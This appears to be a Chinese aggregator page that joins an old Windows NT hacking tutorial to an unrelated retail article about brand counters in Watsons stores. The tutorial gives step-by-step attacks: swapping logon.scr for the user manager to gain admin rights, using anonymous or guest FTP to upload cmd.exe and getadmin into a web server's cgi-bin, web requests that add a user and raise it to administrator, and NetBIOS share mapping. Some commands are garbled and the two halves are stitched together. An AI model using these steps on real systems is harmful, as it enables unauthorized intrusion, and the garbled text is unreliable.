即便是Administrastor账户也不安全

“vv大家碧玉”通过精心收集，向本站投稿了2篇即便是Administrastor账户也不安全，下面小编给大家整理后的即便是Administrastor账户也不安全，欢迎阅读!

篇1：即便是Administrastor账户也不安全

正文：

如果你有普通用户帐号，有个一个很简单的方法获取NT Administrator帐号:

之一: 先把c:winntsystem32下的logon.scr改名为logon.old备份，然后把usrmgr.exe改名为logon.scr，然后重新启动。

logon.scr是启动时加载的程序，重新启动后，不会出现以往的登陆密码输入界面，而是用户管理器。

这时他就有权限把自己加到Administrator组，不要忘记把文件名改回来啊!

之二:

下面的技术适用于不重视NT网络安全的网站, 一些 http的技术也可以供较高级的人员参考。进入NT网络可以采取下面的步骤:

因为nt的iis server的ftp一般都是允许anonymous匿名帐号进入的，有些anonymous的帐号还有upload权限，我们就要攻击这类站点。因为如果不允许匿名帐号，就可能造成明文密码在网上传输。用tcpspy的工具可以截获这些密码。现在不谈这些比较高级的技术。

正因为允许匿名帐号ftp登陆的设定，也给我们带来了突破nt server的机会。我们用ftp登陆一个nt server,比如:www.xxx.com(示例名):

ftp www.xxx.com connected to www.xxx.com/>    ntsvr2这个东西暴露了其netbios名，那么在iis的背景下，必然会有一个iuser_ntsvr2的用户帐号，属于domain user组，这个帐号我们以后要用来获取administrator的权限。

user (www.xxx.comnone)):anonymous password: 输入 guest@ 或者guest/>    对于缺乏网络安全知识的管理员来说，很多人没有将guest帐号禁止，或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号，虽然只属于domain guest组。

在这种情况下我们就可以进nt server的ftp了。

进去以后,看看目录列表，试试 cd /c 或wwwroot等关键目录，如果运气好,改变目录成功，这时你就有了80%的把握。

现在，开始查找cgi-bin目录(或者scripts目录)。进去以后，把winnt下的cmd.execopy到cgi-bin，把getadmin和gasys.dll传上去到cgi-bin。

然后输入:www.xxx.com/cgi-bin/getadmin.exe?iusr_saturn

大约十多秒后屏幕显示:

cgi error/>    这时有90%的可能是：你已经把iuser_ntsvr2升级为administrator，也就是任何访问该web站的人都是管理员，

下面可以add user:

www.xxx.com/cgi-bin/cmd.exe?/c c:winntsystem32net.exe user china news /add/>    这样就创建了一个叫china用户，密码是news，然后：

www.xxx.com/cgi-bin/getadmin.exe?china/>    或者

www.xxx.com/scripts/tools/getadmin.exe?china/>    你再用china的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。

之三：

用nt的netbios技术扫描

nbtstat -a www.xxx.com//>    或者，

nbtstat -a www.xxx.com//>    这样可以得到其域的共享资源名称；

net view file:/www.xxx.com//>    可以获得其机器的共享资源名称，如果有c盘，

net use f: file:/www.xxx.com/c/>    可以用f：映射其c盘，

net use $“>/111.111.111.111ipc$content$nbsp;”quot;“quot; /user:”quot;"quot;/>    之四: unix下移植过来的工具：

windows95和98的用户可以用这个tcp/ip工具去抓tcp/ip连接中的包：windump95.exe 使用前还要下载这个库 packet95.exe。

windowsnt用户的版本，windump.exe packetnt.exe

篇2：即便是屈臣氏这样的大庄家也不能随便跟

对于越来越密集的屈臣氏新门店而言，月销只有30万的店并不是少数，

即便是屈臣氏这样的大庄家也不能随便跟

。这种店，一旦上柜上人，几乎可以断定亏本无疑，而且很难翻身。

进入中国内地已超过10年的屈臣氏日前宣布，内地门店数量超过1000家，并计划到2016年将这个数字增加到3000家。

这10年来，多少人跟着屈臣氏吃香的喝辣的。如今眼看屈臣氏的门店越来越密集，已经有接近便利店的趋势，但在屈臣氏店内设置专柜的品牌厂家心里却直打鼓，因为他们很清楚，专柜是不能跟着屈臣氏的步伐“随意”扩张的。

冒进专柜的尴尬

屈臣氏对自己的运营成本控制相当得力：租金多少，该请多少人，需不需要清洁人员等等，都与门店的整体生意挂钩，而且尽可能以点数进行计算。生意没达标，调岗，裁员，减人，反正还有大把的厂家促销员帮干活。

而厂家的品牌专柜，很多成本却是固定支出。

咱们不妨算一下：

制作费用：大品牌对形象要求很高，制作费少则2、3万，多则7、8万。一个专柜只有三年的使用期，相当于一年的折旧费就要2万。除了专柜费用，每个季度试用台的更换、灯箱片的费用也不是小数目，光是形象投入，每年的固定费用至少3万块。

人员费用：早晚班两个促销，一年最少也要5万，还不包括因为门店扩张所增加的主管费用。

物流费用：专柜从做好发到门店，物流费要好几千。这还不包括季度形象（灯片、试用台）更换时产生的费用。

这么算下来，一个专柜每年的固定费用至少9万。假设一个品牌的毛利为20%，那么一个柜一年要有45万的零售额才能勉强平本，也就是月均销售至少要3.8万。

假设某专柜品牌，在屈臣氏已有门店的平均销售占比为4%，那么只能选择月均销售95万的屈臣氏进驻，否则就是亏本。但对于越来越密集的屈臣氏新门店而言，月销只有30万的店并不是少数。这种店，一旦上柜上人，几乎可以断定亏本无疑，而且很难翻身。

为什么呢？

专柜进去后，除非门店关闭或采购主动调整，否则基本上不会撤柜。进柜后，销售如果没达标，厂家就会变得特别尴尬：不撤柜吧，不知道要培养多长时间才能回本；撤柜吧，门店不允许，而且专柜是量身订做，基本上也没有办法二次利用，

如果不撤柜光撤人，专柜很难有自然销售，因为各个品牌的促销员饱和，终端被拦截，顾客极易流失。没有促销员的专柜，门店也会担心货品丢失，然后就减少货品订单。慢慢地，这个专柜就变成其他品牌的陈列架，甚至赠品陈列柜，没有任何效益。

哪些店千万不要进？

新商圈新店：

老商圈日趋饱和，新商圈层出不穷，顾客的选择越来越多。但是，新商圈需要长期培养，新店新柜已属冒险，如果门店所处商圈尚未成熟，更是险上加险。

所以，新商圈新店建议不要进柜，等到时机成熟后再考虑。不要担心位置不好，也不要担心位置太小。一个不赚钱的门店，放再大的柜都是浪费。

老商圈死角门店：

很多人以为老商圈开了很多年，客源充足是不是就可以进驻呢？

答案也是要先等一等。

曾经有一个品牌专柜，位置不错，收银台正对面，但这个门店在商场的负二楼，整层楼只有一个屈臣氏和一些床上用品，到店客流屈指可数。没多久，促销员就因为销售太差辞职了，新人不好招，生意越来越差。

调整中的商圈：

有一个商圈位置不错，周边都是高端小区，屈臣氏开在负一楼，和耐克、阿迪达斯等潮流品牌同一楼层，销售非常理想。

进驻后不到一年，商场调整，所有潮牌调整到三楼，负一楼变成家电区，客流骤减，销售下滑了40%。厂家在商场调整前进柜，欲哭无泪。

商圈调整有很多渠道可以了解，而很多人正缺乏这些调查，导致新开店又一次失败。

百货高层店中店：

百货店的客户一直是高消费群体，和百货店合作，销售应该会好吧？

如果开在一楼，几乎可以不用考虑立刻进驻。但由于租金昂贵，位置有限，很多时候屈臣氏只能拿到高层铺面，比如四楼超市旁。

这样的门店很难保证客流。百货店越往上，人越少，虽然有消费力，但一天不到30人的客流，10多个促销员争得头破血流又怎样？

超市店：

看似人流很大，但跟着顾客动线到化妆品区走一走，客流还多吗？消费者的购物车里放的都是些什么？

顾客到超市多为采购日常必需品，对高价护肤品而言，不建议进驻，除非整个护肤品区，尤其是彩妆和高单价护肤品的销售非常理想。

【即便是Administrastor账户也不安全】相关文章：

1.煤矿不安全行为管理办法

2.员工不安全行为检讨书

3.资金账户监管协议书

4.账户冻结申请书格式

5.银行账户开通请示

6.银行结算账户自查报告

7.境内外账户管理规定

8.银行监管账户管理办法

9.银行结算账户的自查报告

10.零余额账户管理规定